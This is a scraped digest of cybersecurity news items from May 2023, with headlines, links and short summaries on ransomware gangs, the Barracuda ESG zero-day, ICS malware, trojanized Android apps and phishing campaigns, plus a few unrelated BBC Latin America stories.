                The post Is the BlackByte ransomware gang behind the City of Augusta attack? appeared first on Security Affairs.


                New Buhti ransomware uses leaked payloads and public exploits

                exploits ransomware
                2023-05-26 https://www.helpnetsecurity.com/2023/05/26/buhti-ransomware/

                A newly identified ransomware operation has refashioned leaked LockBit and Babuk payloads into Buhti ransomware, to launch attacks on both Windows and Linux systems. Use of public exploits One notable aspect of the attackers leveraging the Buhti ransomware is their ability to quickly exploit newly disclosed vulnerabilities (e.g., the recently patched PaperCut and IBM Aspera Faspex flaws). The attackers are leveraging public exploits, Dick O’Brien, principal intelligence analyst with Symantec Threat Hunter team told Help … More

                The post New Buhti ransomware uses leaked payloads and public exploits appeared first on Help Net Security.

                Autosummary: “While the reuse of leaked payloads is often the hallmark of a less-skilled ransomware operation, Blacktail’s general competence in carrying out attacks, coupled with its ability to recognize the utility of newly discovered vulnerabilities, suggests that it is not to be underestimated,” Symantec has concluded.


                Threat actors exploit new channels for advanced phishing attacks

                financial exploits
                2023-05-26 https://www.helpnetsecurity.com/2023/05/26/advanced-phishing-attacks-increase-2022/

                Perception Point’s team has identified a 356% increase in the number of advanced phishing attacks attempted by threat actors in 2022. Overall, the total number of attacks increased by 87%, highlighting the growing threat that cyber attacks now pose to organizations. Phishing attacks increase Throughout 2022, Perception Point’s team analyzed several concerning trends. Firstly, malicious actors continue to gain widespread access to new tools and advances in artificial intelligence (AI) and machine learning (ML) which … More

                The post Threat actors exploit new channels for advanced phishing attacks appeared first on Help Net Security.

                Autosummary: “As the global threat landscape continues to evolve, we are sharing vital data that portrays the meteoric rise in the number of attacks, combined with increasingly sophisticated attack techniques that are designed to breach and damage organizations,” said Yoram Salinger, CEO of Perception Point.


                Cybercriminals masquerading as MFA vendors

                ciber
                2023-05-26 https://www.helpnetsecurity.com/2023/05/26/emerging-email-based-threats/

                Cybercriminals are increasingly posing as multi-factor authentication vendors and small businesses are becoming more popular targets, according to VIPRE. Attachment-based malspam is on the rise Financial institutions (48%) are still the most targeted sector by a wide margin. Insider attacks now take on average 85 days to contain – up from 77 days the previous year. The most common phishing links are compromised websites (52%), newly registered domains (39%), and subdomain cybersquatting (9%). The report … More

                The post Cybercriminals masquerading as MFA vendors appeared first on Help Net Security.

                Autosummary: Emerging email-based threats To combat emerging email-based threats, VIPRE’s report highlights four recommendations that will enable businesses and their employees to fortify themselves against opportunistic email attacks: Cybercriminals are posing as MFA vendors.


                Barracuda Warns of Zero-Day Exploited to Breach Email Security Gateway Appliances

                exploits
                2023-05-26 https://thehackernews.com/2023/05/barracuda-warns-of-zero-day-exploited.html
                Email protection and network security services provider Barracuda is warning users about a zero-day flaw that it said has been exploited to breach the company's Email Security Gateway (ESG) appliances. The zero-day is being tracked as CVE-2023-2868 and has been described as a remote code injection vulnerability affecting versions 5.1.3.001 through 9.2.0.006. The California-headquartered firm

                Autosummary: The WordPress security company said it "blocked nearly 3 million attacks against more than 1.5 million sites, from nearly 14,000 IP addresses since May 23, 2023, and attacks are ongoing."


                New COSMICENERGY Malware Exploits ICS Protocol to Sabotage Power Grids

                exploits industry
                2023-05-26 https://thehackernews.com/2023/05/new-cosmicenergy-malware-exploits-ics.html
                A new strain of malicious software that's engineered to penetrate and disrupt critical systems in industrial environments has been unearthed. Google-owned threat intelligence firm Mandiant dubbed the malware COSMICENERGY, adding it was uploaded to a public malware scanning utility in December 2021 by a submitter in Russia. There is no evidence that it has been put to use in the wild. "The

                Autosummary: "The malware is designed to cause electric power disruption by interacting with IEC 60870-5-104 (IEC-104) devices, such as remote terminal units (RTUs), that are commonly leveraged in electric transmission and distribution operations in Europe, the Middle East, and Asia," the company said.


                Careless IT security worker exploited ransomware attack against his employer, but failed to cover his tracks

                exploits ransomware
                2023-05-26 https://www.tripwire.com/state-of-security/rogue-it-security-worker-failed-cover-his-tracks
                Bad enough for your company to be held to ransom after a cyber attack. Worse still to then have one of your own employees exploit the attack in an attempt to steal the ransom for themselves. Read more in my article on the Tripwire State of Security blog.

                Autosummary: The company did the right thing - it informed the police, and it assigned its own IT security staff to investigate the attack, find out how it had occurred, and mitigate any damage which had been caused.


                New CosmicEnergy ICS malware threatens energy grid assets

                exploits industry
                2023-05-26 https://securityaffairs.com/146675/ics-scada/cosmicenergy-ics-malware.html

                Experts detailed a new piece of malware, named CosmicEnergy, that is linked to Russia and targets industrial control systems (ICS).  Researchers from Mandiant discovered a new malware, named CosmicEnergy, designed to target operational technology (OT) / industrial control system (ICS) systems. The malicious code was first uploaded to a public malware scanning service in December 2021 by […]

                The post New CosmicEnergy ICS malware threatens energy grid assets appeared first on Security Affairs.


                US govt contractor ABB confirms ransomware attack, data theft

                exploits ransomware
                2023-05-26 https://www.bleepingcomputer.com/news/security/us-govt-contractor-abb-confirms-ransomware-attack-data-theft/
                Swiss tech multinational and U.S. government contractor ABB has confirmed that some of its systems were impacted by a ransomware attack, previously described by the company as "an IT security incident." [...]

                Autosummary: Since its launch, Black Basta has been responsible for attacks targeting the American Dental Association, Sobeys, Knauf, Yellow Pages Canada, UK outsourcing company Capita, and, more recently, German defense contractor Rheinmetall.


                BlackByte ransomware claims City of Augusta cyberattack

                exploits government ransomware ciber
                2023-05-26 https://www.bleepingcomputer.com/news/security/blackbyte-ransomware-claims-city-of-augusta-cyberattack/
                The city of Augusta in Georgia, U.S., has confirmed that the most recent IT system outage was caused by unauthorized access to its network. [...]

                Autosummary: The leaked documents seen by BleepingComputer contain payroll information, contact details, personally identifiable information (PII), physical addresses, contracts, city budget allocation data, and other types of details.


                The Week in Ransomware - May 26th 2023 - Cities Under Attack

                exploits ransomware
                2023-05-26 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-may-26th-2023-cities-under-attack/
                Ransomware gangs continue to hammer local governments in attacks, taking down IT systems and disrupting city's online services. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @demonslay335, @malwrhunterteam, @BleepinComputer, @serghei, @billtoulas, @fwosar, @Ionut_Ilascu, @struppigel, @LawrenceAbrams, @Seifreed, @security_score, @Unit42_Intel, @_CPResearch_, @pcrisk, @BroadcomSW, @uuallan, @Jon__DiMaggio, @AShukuhi, @BushidoToken, @BrettCallow, and @UK_Daniel_Card. "The City of Augusta, GA began experiencing technical difficulties this past Sunday, May 21, 2023, unrelated to last week's outage, resulting in a disruption to certain computer systems," reads the City's statement.


                How an innocuous app morphed into a trojan – Week in security with Tony Anscombe

                exploits
                2023-05-26 https://www.welivesecurity.com/videos/app-morphed-trojan-week-security-tony-anscombe/

                ESET research uncovers an Android app that initially had no harmful features but months later turned into a spying tool

                The post How an innocuous app morphed into a trojan – Week in security with Tony Anscombe appeared first on WeLiveSecurity


                Mexico Popocatépetl volcano spews ash across region

                latam
                2023-05-26 https://www.bbc.co.uk/news/world-latin-america-65642959?at_medium=RSS&at_campaign=KARANGA
                Volcano ash has been falling like snow in Mexico and leaves residents worried about an eruption.


                The essence of OT security: A proactive guide to achieving CISA’s Cybersecurity Performance Goals

                ciber
                2023-05-25 https://www.helpnetsecurity.com/2023/05/25/cisa-cybersecurity-performance-goals/

                The widespread adoption of remote and hybrid working practices in recent years has brought numerous benefits to various industries, but has also introduced new cyber threats, particularly in the critical infrastructure sector. These threats extend not only to IT networks but also to operational technology (OT) and cyber-physical systems, which can directly influence crucial physical processes. In response to these risks, the US government reinforced critical infrastructure security by introducing Cross-Sector Cybersecurity Performance Goals (CPGs) … More

                The post The essence of OT security: A proactive guide to achieving CISA’s Cybersecurity Performance Goals appeared first on Help Net Security.

                Autosummary: CPG 1.0 Identify: Scoping out the vulnerabilities in the OT environment CISA’s first CPG is “Identify”, which includes identifying the vulnerabilities in the IT and OT assets inventory, establishing supply chain incident reporting and vulnerability disclosure program, validating the effectiveness of third-party security controls across your IT and OT networks, establishing OT security leadership, and mitigating known vulnerabilities. Addressing all these aspects of account security can be a chore for most organizations, but they can turn to unified secure remote access (SRA) solutions that can extend multiple account-level security controls to OT remote users via enforcement of multi-factor authentication (MFA), least privilege policies, and role-based access.


                How smart bots are infecting and exploiting the internet

                exploits
                2023-05-25 https://www.helpnetsecurity.com/2023/05/25/malicious-bot-activity-video/

                According to Imperva, bad bot traffic grew to 30.2%, a 2.5% increase over 2021. In this Help Net Security video, Lynn Marks, Senior Product Manager at Imperva, discusses malicious bot activity. This is a substantial threat for businesses, leading to potential consequences such as compromised accounts, stolen data, spam, increased infrastructure and support expenses, customer attrition, and diminished online services. These automated attacks targeting organizations’ websites, infrastructure, APIs, and applications each year result in billions … More

                The post How smart bots are infecting and exploiting the internet appeared first on Help Net Security.


                Realistic simulations are transforming cybersecurity training

                ciber
                2023-05-25 https://www.helpnetsecurity.com/2023/05/25/cybersecurity-training-programs-simulations/

                To achieve a diverse and well-trained cybersecurity workforce, organizations recognize the value of a quality training program supported by the pursuit of cybersecurity certifications, according to Security Innovation and Ponemon Institute. The report revealed a growing embrace of realistic simulations in training programs, with respondents ranking this feature as highly effective and delivering the greatest ROI compared with other cybersecurity training program components. Positive shifts in cybersecurity training programs The report found positive shifts in … More

                The post Realistic simulations are transforming cybersecurity training appeared first on Help Net Security.

                Autosummary: Many companies have implemented accountability measures by making training requirements mandatory – 45% of companies do not allow learners to waive cybersecurity training requirements compared with only 20% in 2020 – while 53% now report results to C-level executives in their organization, up from 31% in 2020.


                12 vulnerabilities newly associated with ransomware

                exploits ransomware
                2023-05-25 https://www.helpnetsecurity.com/2023/05/25/12-new-ransomware-vulnerabilities-q1-2023/

                In March 2023, the total number of breaches reported was higher than those reported in the previous three years combined, according to Ivanti. Ransomware groups are continuously weaponizing vulnerabilities and adding them to their arsenal to mount crippling and disruptive attacks on their victims. In Q1 2023, researchers identified 12 vulnerabilities newly associated with ransomware. They have also provided an update on key metrics being tracked in relation to ransomware, offering valuable insights to enterprises … More

                The post 12 vulnerabilities newly associated with ransomware appeared first on Help Net Security.

                Autosummary: “One of the biggest challenges for IT and security teams is prioritizing and remediating vulnerabilities, particularly those tied to ransomware,” according to Srinivas Mukkamala, CPO at Ivanti. The weakness categories The report also tracks the weakness categories contributing to vulnerabilities weaponized by ransomware groups, highlighting the lack of security in software products and operating systems widely used by enterprises.


                Iranian Agrius Hackers Targeting Israeli Organizations with Moneybird Ransomware

                financial exploits ransomware
                2023-05-25 https://thehackernews.com/2023/05/iranian-agrius-hackers-targeting.html
                The Iranian threat actor known as Agrius is leveraging a new ransomware strain called Moneybird in its attacks targeting Israeli organizations. Agrius, also known as Pink Sandstorm (formerly Americium), has a track record of staging destructive data-wiping attacks aimed at Israel under the guise of ransomware infections. Microsoft has attributed the threat actor to Iran's Ministry of

                Autosummary: "The use of a new ransomware, written in C++, is noteworthy, as it demonstrates the group's expanding capabilities and ongoing effort in developing new tools," Check Point researchers Marc Salinas Fernandez and Jiri Vinopal said.


                Iran-linked Tortoiseshell APT behind watering hole attacks on shipping and logistics Israeli websites

                industry
                2023-05-25 https://securityaffairs.com/146625/apt/iranian-tortoiseshell-israeli-logistics-industry.html

                Iran-linked threat actor Tortoiseshell targeted shipping, logistics, and financial services companies in Israel with watering hole attacks. ClearSky Cyber Security uncovered a watering hole attack on at least eight Israeli websites belonging to shipping, logistics, and financial services companies and attributed them with low confidence to the Iran-linked APT group Tortoiseshell (aka TA456 or Imperial […]

                The post Iran-linked Tortoiseshell APT behind watering hole attacks on shipping and logistics Israeli websites appeared first on Security Affairs.


                ‘Operation Magalenha’ targets credentials of 30 Portuguese banks

                financial
                2023-05-25 https://www.bleepingcomputer.com/news/security/operation-magalenha-targets-credentials-of-30-portuguese-banks/
                A Brazilian hacking group has been targeting thirty Portuguese government and private financial institutions since 2021 in a malicious campaign called "Operation Magalenha." [...]

                Autosummary: Examples of the targeted entities include ActivoBank, Caixa Geral de Depósitos, CaixaBank, Citibanamex, Santander, Millennium BCP, ING, Banco BPI, and Novobanco.


                New Buhti ransomware gang uses leaked Windows, Linux encryptors

                exploits ransomware
                2023-05-25 https://www.bleepingcomputer.com/news/security/new-buhti-ransomware-gang-uses-leaked-windows-linux-encryptors/
                A new ransomware operation named "Buhti" uses the leaked code of the LockBit and Babuk ransomware families to target Windows and Linux systems, respectively. [...]

                Autosummary: The tool targets the following file types for theft: pdf, php, png, ppt, psd, rar, raw, rtf, sql, svg, swf, tar, txt, wav, wma, wmv, xls, xml, yml, zip, aiff, aspx, docx, epub, json, mpeg, pptx, xlsx, and yaml.


                Phishing campaign targets ChatGPT users

                financial
                2023-05-25 https://www.helpnetsecurity.com/2023/05/25/chatgpt-phishing/

                A clever phishing campaign aimed at stealing users’ business email account credentials by impersonating OpenAI, the company behind the ChatGPT chatbot, has been spotted by Inky researchers. The attack ChatGPT has quickly gained popularity and is used widely by individuals and organizations. That’s enough of a reason for cybercriminals to impersonate the brand. The initial phase of the attack involves the victim receiving an email that appears legitimate, purportedly sent by OpenAI. The email requests … More

                The post Phishing campaign targets ChatGPT users appeared first on Help Net Security.

                Autosummary: “The redirection happens because the personal code uses a my_slice variable “window.location.replace()” to construct a new URL (…) and replace the existing malicious URL,” INKY experts explained.


                Barracuda email security appliances hacked via zero-day vulnerability (CVE-2023-2868)

                exploits
                2023-05-25 https://www.helpnetsecurity.com/2023/05/25/cve-2023-2868/

                A vulnerability (CVE-2023-2868) in Barracuda Networks’ Email Security Gateway (ESG) appliances has been exploited by attackers, the company has warned. About CVE-2023-2868 CVE-2023-2868 is a critical remote command injection vulnerability affecting only physical Barracuda Email Security Gateway appliances, versions 5.1.3.001 – 9.2.0.006. “The vulnerability arises out of a failure to comprehensively sanitize the processing of .tar file (tape archives). [It] stems from incomplete input validation of a user-supplied .tar file as it pertains to the … More

                The post Barracuda email security appliances hacked via zero-day vulnerability (CVE-2023-2868) appeared first on Help Net Security.

                Autosummary: Reddit users on the sysadmin subreddit have lamented the vagueness of the public alert and one of them shared the email sent by Barracuda’s support team, in which it advised customers to rotate any credentials connected to the ESG appliance: LDAP, AD, Barracuda Cloud Control, FTP and SMB credentials, as well as any private TLS certificates.


                Alert: Brazilian Hackers Targeting Users of Over 30 Portuguese Banks

                financial latam
                2023-05-25 https://thehackernews.com/2023/05/alert-brazilian-hackers-targeting-users.html
                A Brazilian threat actor is targeting more than 30 Portuguese financial institutions with information-stealing malware as part of a long-running campaign that commenced in 2021. "The attackers can steal credentials and exfiltrate users' data and personal information, which can be leveraged for malicious activities beyond financial gain," SentinelOne researchers Aleksandar Milenkoski and Tom

                Autosummary: "With the first PeepingTitle variant capturing the entire screen, and the second capturing each window a user interacts with, this malware duo provides the threat actor with a detailed insight into user activity," the researchers explained.


                Buhti Ransomware Gang Switches Tactics, Utilizes Leaked LockBit and Babuk Code

                exploits ransomware industry
                2023-05-25 https://thehackernews.com/2023/05/buhti-ransomware-gang-switches-tactics.html
                The threat actors behind the nascent Buhti ransomware have eschewed their custom payload in favor of leaked LockBit and Babuk ransomware families to strike Windows and Linux systems. "While the group doesn't develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types," Symantec said in a

                Autosummary: "While the reuse of leaked payloads is often the hallmark of a less-skilled ransomware operation, Blacktail's general competence in carrying out attacks, coupled with its ability to recognize the utility of newly discovered vulnerabilities, suggests that it is not to be underestimated," Symantec said.


                North Korea-linked Lazarus APT targets Microsoft IIS servers to deploy malware

                exploits
                2023-05-25 https://securityaffairs.com/146639/hacking/lazarus-targets-microsoft-iis-servers.html

                North Korea-linked APT group Lazarus has been targeting vulnerable Microsoft IIS servers to deploy malware. AhnLab Security Emergency response Center (ASEC) researchers reported that the Lazarus APT Group is targeting vulnerable versions of Microsoft IIS servers in a recent wave of malware-based attacks. Once they discover a vulnerable IIS server, the attackers leverage the DLL side-loading […]

                The post North Korea-linked Lazarus APT targets Microsoft IIS servers to deploy malware appeared first on Security Affairs.


                Microsoft 365 phishing attacks use encrypted RPMSG messages

                financial
                2023-05-25 https://www.bleepingcomputer.com/news/security/microsoft-365-phishing-attacks-use-encrypted-rpmsg-messages/
                Attackers are now using encrypted RPMSG attachments sent via compromised Microsoft 365 accounts to steal Microsoft credentials in targeted phishing attacks designed to evade detection by email security gateways. [...]

                Autosummary: The harvested data includes visitor ID, connect token and hash, video card renderer information, system language, device memory, hardware concurrency, installed browser plugins, browser window details, and OS architecture.


                New Russian-linked CosmicEnergy malware targets industrial systems

                exploits industry rusia-ucrania
                2023-05-25 https://www.bleepingcomputer.com/news/security/new-russian-linked-cosmicenergy-malware-targets-industrial-systems/
                Mandiant security researchers have discovered a new malware strain known as CosmicEnergy that targets operational technology (OT), raising concerns about potential disruptions to electric power systems worldwide. [...] "

                Autosummary: The list includes but is not limited to WhisperGate/WhisperKill, FoxBlade (aka HermeticWiper), SonicVote (aka HermeticRansom), CaddyWiper, DesertBlade, Industroyer2, Lasainraw (aka IsaacWiper), and FiberLake (aka DoubleZero). "


                Sorry scammer, I’m not cancelling my McAfee Antivirus subscription

                financial
                2023-05-25 https://grahamcluley.com/sorry-scammer-im-not-cancelling-my-mcafee-antivirus-subscription/
                I was surprised to receive an email this week telling me that I had renewed my annual subscription for McAfee virus protection. Would you, or a member of your family, have fallen for this scam? "

                Autosummary: However, the email tells me that my bank account has already been debited for $249.99 (that sounds like a lot, even if it is to protect two devices with not just anti-virus but also “theft protection.”) "


                Corvus Signal provides continuous threat analysis, tailored alerts and always-on recommendations

                ransomware
                2023-05-25 https://www.helpnetsecurity.com/2023/05/25/corvus-signal/

                Corvus Insurance has unveiled Corvus Signal, the risk prevention solution that brings together brokers, policyholders, and Corvus security experts in partnership. Corvus Signal has been shown to reduce cyber breach frequency and cost by up to 20 percent. The announcement comes amid increasing market activity and interest in combining cyber insurance with risk management services. Corvus Signal is the solution that demonstrates such an approach can bend the loss curve. For more than three years, … More

                The post Corvus Signal provides continuous threat analysis, tailored alerts and always-on recommendations appeared first on Help Net Security.

                "

                Autosummary: “We found, through extensive experience working with policyholders, that a partnership-based approach combining personalized cyber threat insights and risk advisory services is the most effective way to curb cyber risk for organizations,” said Jason Rebholz, CISO at Corvus Insurance. "


                Dark Frost Botnet Launches Devastating DDoS Attacks on Gaming Industry

                industry
                2023-05-25 https://thehackernews.com/2023/05/dark-frost-botnet-launches-devastating.html
                A new botnet called Dark Frost has been observed launching distributed denial-of-service (DDoS) attacks against the gaming industry. "The Dark Frost botnet, modeled after Gafgyt, QBot, Mirai, and other malware strains, has expanded to encompass hundreds of compromised devices," Akamai security researcher Allen West said in a new technical analysis shared with The Hacker News. Targets include "

                Autosummary: "The Dark Frost botnet, modeled after Gafgyt, QBot, Mirai, and other malware strains, has expanded to encompass hundreds of compromised devices," Akamai security researcher Allen West said in a new technical analysis shared with The Hacker News. "


                New PowerExchange Backdoor Used in Iranian Cyber Attack on UAE Government

                government
                2023-05-25 https://thehackernews.com/2023/05/new-powerexchange-backdoor-used-in.html
                An unnamed government entity associated with the United Arab Emirates (U.A.E.) was targeted by a likely Iranian threat actor to breach the victim's Microsoft Exchange Server with a "simple yet effective" backdoor dubbed PowerExchange. According to a new report from Fortinet FortiGuard Labs, the intrusion relied on email phishing as an initial access pathway, leading to the execution of a .NET "

                Autosummary: "Using the victim's Exchange server for the C2 channel allows the backdoor to blend in with benign traffic, thereby ensuring that the threat actor can easily avoid nearly all network-based detections and remediations inside and outside the target organization's infrastructure," the researchers said. "


                Google removes "Slavery Simulator" game amid outrage in Brazil

                latam
                2023-05-25 https://www.bbc.co.uk/news/world-latin-america-65714083?at_medium=RSS&at_campaign=KARANGA
                The app, which allowed players to "buy and sell" black characters, was launched last month. "

                Autosummary: "


                "Beautiful Cookie Consent Banner" WordPress plugin vulnerability: Update now!

                exploits
                2023-05-25 https://www.malwarebytes.com/blog/news/2023/05/beautiful-cookie-consent-banner-wordpress-plugin-vulnerability-update-now

                Categories: Business

                Tags: beautiful cookie consent banner

                Tags: Wordpress

                Tags: plugin

                Tags: vulnerability

                Tags: exploit

                Tags: XSS

                Tags: javascript

                Tags: update

                Tags: website

                We take a look at a vulnerability in a popular WordPress plugin. It's been fixed, but you'll need to update as soon as you can!

                The post "Beautiful Cookie Consent Banner" WordPress plugin vulnerability: Update now! appeared first on Malwarebytes Labs.

                "

                Autosummary: What’s interesting with this one, and perhaps why it’s being tagged as “bizarre”, is that the attack is misconfigured, with attacks containing a “partial payload”. The plugin exploit is a cross-site scripting attack (XSS), a type of attack that injects malicious code into otherwise benign websites. Researchers have observed 3 million attacks against more than 1.5 million sites, from nearly 14,000 IP addresses since May 23, 2023. The plugin, which is installed on more than 40,000 sites, has been impacted by a “bizarre campaign” being actively used since at least February 5 of this year. "


                Venezuela: "I'm paid to tweet state propaganda"

                government
                2023-05-25 https://www.bbc.co.uk/news/blogs-trending-65622685?at_medium=RSS&at_campaign=KARANGA
                The Venezuelan government is paying people to tweet in support of it. "

                Autosummary: "


                Navigating the quantum leap in cybersecurity

                ciber
                2023-05-24 https://www.helpnetsecurity.com/2023/05/24/atsushi-yamada-isara-pqc-quantum-leap-cybersecurity/

                In this Help Net Security interview, we sit down with Dr. Atsushi Yamada, the newly appointed CEO of ISARA, a security solutions company specializing in creating quantum-safe cryptography. With over two decades of experience in cryptography and cybersecurity, Dr. Yamada discusses his vision for ISARA and shares his insights on the critical role of post-quantum computing (PQC) in fortifying our digital landscape. Dr. Yamada, you’ve been with ISARA since 2015 and have been appointed CEO. … More

                The post Navigating the quantum leap in cybersecurity appeared first on Help Net Security.

                "

                Autosummary: Our world-class software development kit and PKI solutions, supported by our highly experienced team of engineers and quantum experts, also allow organizations to do proof-of-concept testing of post-quantum cryptographic algorithms, to see how quantum-safe algorithms fit into their systems. The Quantum Computing Cybersecurity Preparedness Act requires federal agencies to maintain an inventory of the cryptographic assets they have in use, assess their quantum vulnerabilities, perform proof-of-concept testing of post-quantum cryptographic algorithms, and then prioritize the migration of those assets. ISARA has been a leader in the cryptographic space since the beginning, and we plan to keep doing so by evolving our product and service offerings, working in collaboration with partners, keeping our focus, and executing on our strategic vision. "


                Legitimate Android app transforms into data-snooping malware

                exploits
                2023-05-24 https://www.helpnetsecurity.com/2023/05/24/irecorder-android-app-malware/

                ESET researchers have discovered a trojanized Android app named iRecorder – Screen Recorder. It was available on Google Play as a legitimate app in September 2021, with malicious functionality most likely added in August 2022. During its existence, the app was installed on more than 50,000 devices. Trojanized iRecorder app The malicious code that was added to the clean version of iRecorder is based on the open-source AhMyth Android RAT (remote access trojan) and has … More

                The post Legitimate Android app transforms into data-snooping malware appeared first on Help Net Security.

                "

                Autosummary: It can also exfiltrate from the device files with extensions representing saved web pages, images, audio, video, and document files, and file formats used for compressing multiple files. "


                N. Korean Lazarus Group Targets Microsoft IIS Servers to Deploy Espionage Malware

                exploits
                2023-05-24 https://thehackernews.com/2023/05/n-korean-lazarus-group-targets.html
                The infamous Lazarus Group actor has been targeting vulnerable versions of Microsoft Internet Information Services (IIS) servers as an initial breach route to deploy malware on targeted systems. The findings come from the AhnLab Security Emergency response Center (ASEC), which detailed the advanced persistent threat's (APT) continued abuse of DLL side-loading techniques to deploy malware. "The "

                Autosummary: "These workers deliberately obfuscate their identities, locations, and nationalities, typically using fake personas, proxy accounts, stolen identities, and falsified or forged documentation to apply for jobs at these companies. "


                Cyber Attacks Strike Ukraine's State Bodies in Espionage Operation

                government
                2023-05-24 https://thehackernews.com/2023/05/cyber-attacks-strike-ukraines-state.html
                The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks targeting state bodies in the country as part of an espionage campaign. The intrusion set, attributed to a threat actor tracked by the authority as UAC-0063 since 2021, leverages phishing lures to deploy a variety of malicious tools on infected systems. The origins of the hacking crew are presently unknown. In "

                Autosummary: That said, Microsoft's restrictions have led several attack groups to experiment and adapt their attack chains and payload delivery mechanisms to include uncommon file types (CHM, ISO, LNK, VHD, XLL, and WSF) and techniques like HTML smuggling. "


                Opti9 collaborates with Wasabi to provide clients with AI-powered ransomware detection

                exploits ransomware
                2023-05-24 https://www.helpnetsecurity.com/2023/05/24/opti9-wasabi/

                Opti9 has been selected by Wasabi Hot Cloud Storage as a Technical Alliance Partner to offer integrated disaster recovery and artificial intelligence (AI) powered ransomware detection services. As a result of this trusted partnership, Wasabi clients can now natively integrate comprehensive disaster recovery and security monitoring that includes proactive protection of their data from ransomware attacks. Opti9 has been a leading managed hybrid cloud solutions and security services provider for over two decades. As part … More

                The post Opti9 collaborates with Wasabi to provide clients with AI-powered ransomware detection appeared first on Help Net Security.

                "

                Autosummary: This includes suspicious changes to retention settings, job definitions, encryption, immutability, data deletion, job modifications or deletion, and many other factors. "


                IT employee piggybacked on cyberattack for personal gain

                ciber
                2023-05-24 https://www.helpnetsecurity.com/2023/05/24/it-employee-blackmailing-company/

                A 28-year-old former IT employee of an Oxford-based company has been convicted of blackmailing his employer and unauthorized access to a computer with intent to commit other offences, after pleading guilty during a hearing at Reading Crown Court, England. IT employee blackmailing his own company The man was employed as an IT Security Analyst when, on February 27, 2018, the company suffered a cyber security incident that resulted in the attacker gaining unauthorized access to … More

                The post IT employee piggybacked on cyberattack for personal gain appeared first on Help Net Security.

                "

                Autosummary: IT employee blackmailing his own company The man was employed as an IT Security Analyst when, on February 27, 2018, the company suffered a cyber security incident that resulted in the attacker gaining unauthorized access to part of the company’s computer systems. "


                Data Stealing Malware Discovered in Popular Android Screen Recorder App

                exploits
                2023-05-24 https://thehackernews.com/2023/05/data-stealing-malware-discovered-in.html
                Google has removed a screen recording app named "iRecorder - Screen Recorder" from the Play Store after it was found to sneak in information stealing capabilities nearly a year after the app was published as an innocuous app. The app (APK package name "com.tsoft.app.iscreenrecorder"), which accrued over 50,000 installations, was first uploaded on September 19, 2021. The malicious functionality "

                Autosummary: "


                Legion Malware Upgraded to Target SSH Servers and AWS Credentials

                exploits
                2023-05-24 https://thehackernews.com/2023/05/legion-malware-upgraded-to-target-ssh.html
                An updated version of the commodity malware called Legion comes with expanded features to compromise SSH servers and Amazon Web Services (AWS) credentials associated with DynamoDB and CloudWatch. "This recent update demonstrates a widening of scope, with new capabilities such as the ability to compromise SSH servers and retrieve additional AWS-specific credentials from Laravel web applications," "

                Autosummary: "This recent update demonstrates a widening of scope, with new capabilities such as the ability to compromise SSH servers and retrieve additional AWS-specific credentials from Laravel web applications," Cado Labs researcher Matt Muir said in a report shared with The Hacker News. "


                Iranian hackers use new Moneybird ransomware to attack Israeli orgs

                financial exploits ransomware
                2023-05-24 https://www.bleepingcomputer.com/news/security/iranian-hackers-use-new-moneybird-ransomware-to-attack-israeli-orgs/
                A suspected Iranian state-supported threat actor known as "Agrius" is now deploying a new ransomware strain named "Moneybird" against Israeli organizations. [...] "

                Autosummary: Webshell in the text file (Check Point) Having deployed the webshells, the attackers proceed to use open-source tools that help in network reconnaissance using SoftPerfect Network Scanner, lateral movement, secure communication using Plink/PuTTY, credential stealing with ProcDump, and the exfiltration of data using FileZilla. "


                Barracuda warns of email gateways breached via zero-day flaw

                exploits
                2023-05-24 https://www.bleepingcomputer.com/news/security/barracuda-warns-of-email-gateways-breached-via-zero-day-flaw/
                Barracuda, a company known for its email and network security solutions, warned customers today that some of their Email Security Gateway (ESG) appliances were breached last week by targeting a now-patched zero-day vulnerability. [...] "

                Autosummary: "


                Kasten K10 V6.0 enables organizations to create proactive ransomware protection strategies

                exploits ransomware
                2023-05-24 https://www.helpnetsecurity.com/2023/05/24/kasten-k10-v6-0/

                Kasten by Veeam released its new Kasten K10 V6.0 Kubernetes data protection platform. The new release includes features that will help customers scale their cloud native data protection more efficiently, better protect their applications and data against ransomware attacks, and increase accessibility by adding new cloud native integrations. Kubernetes was designed to enable greater productivity – helping enterprises scale automation to manage very large deployments found within containerized environments. Kubernetes has now garnered industry-standard status … More

                The post Kasten K10 V6.0 enables organizations to create proactive ransomware protection strategies appeared first on Help Net Security.

                "

                Autosummary: “Kasten by Veeam’s Kasten K10 v6.0 provides detection capabilities, immutable backups and instant recovery to address this, but perhaps more importantly, this release also introduces automation and efficiency capabilities to open the doors for large-scale container protection deployment – an inevitability for any company using containers seriously,” said Johnny Yu, Research Manager, Storage and Computing at IDC. “Through our collaboration with Kasten by Veeam, we are providing customers with additional flexibility and choice in how they protect their Kubernetes workloads,” said Kirsten Newcomer, Director, Cloud and DevSecOps Strategy, Red Hat. "


                Honeywell launches Cyber Insights to identify cybersecurity threats in OT environments

                ciber
                2023-05-24 https://www.helpnetsecurity.com/2023/05/24/honeywell-cyber-insights/

                Honeywell released its operational technology (OT) cybersecurity solution, Honeywell Forge Cybersecurity+ | Cyber Insights, to assist customers in improving the availability, reliability and safety of their industrial control systems and operations. Cyber Insights is designed to integrate information from multiple OT data sources in order to provide a customer with actionable insights into their facility’s cybersecurity vulnerabilities and threats, allowing the customer to manage their compliance strategy, thereby helping reduce their overall cybersecurity risks. Companies … More

                The post Honeywell launches Cyber Insights to identify cybersecurity threats in OT environments appeared first on Help Net Security.

                "

                Autosummary: "


                Appdome’s Build-to-Test streamlines mobile app cybersecurity testing

                ciber
                2023-05-24 https://www.helpnetsecurity.com/2023/05/24/appdome-build-to-test/

                Appdome has released Build-to-Test, which enables mobile developers to streamline the testing of cybersecurity features in mobile apps. The new capability allows Appdome-protected mobile apps to recognize when automated mobile app testing suites are in use and to let those tests complete securely without interruption by a vendor, while logging all security events for the developer to track and monitor. In continuous integration, continuous delivery (CI/CD) pipelines, mobile app quality assurance is done via automated testing services so the functionality … More

                The post Appdome’s Build-to-Test streamlines mobile app cybersecurity testing appeared first on Help Net Security.

                "

                Autosummary: "


                Iranian Tortoiseshell Hackers Targeting Israeli Logistics Industry

                industry
                2023-05-24 https://thehackernews.com/2023/05/iranian-tortoiseshell-hackers-targeting.html
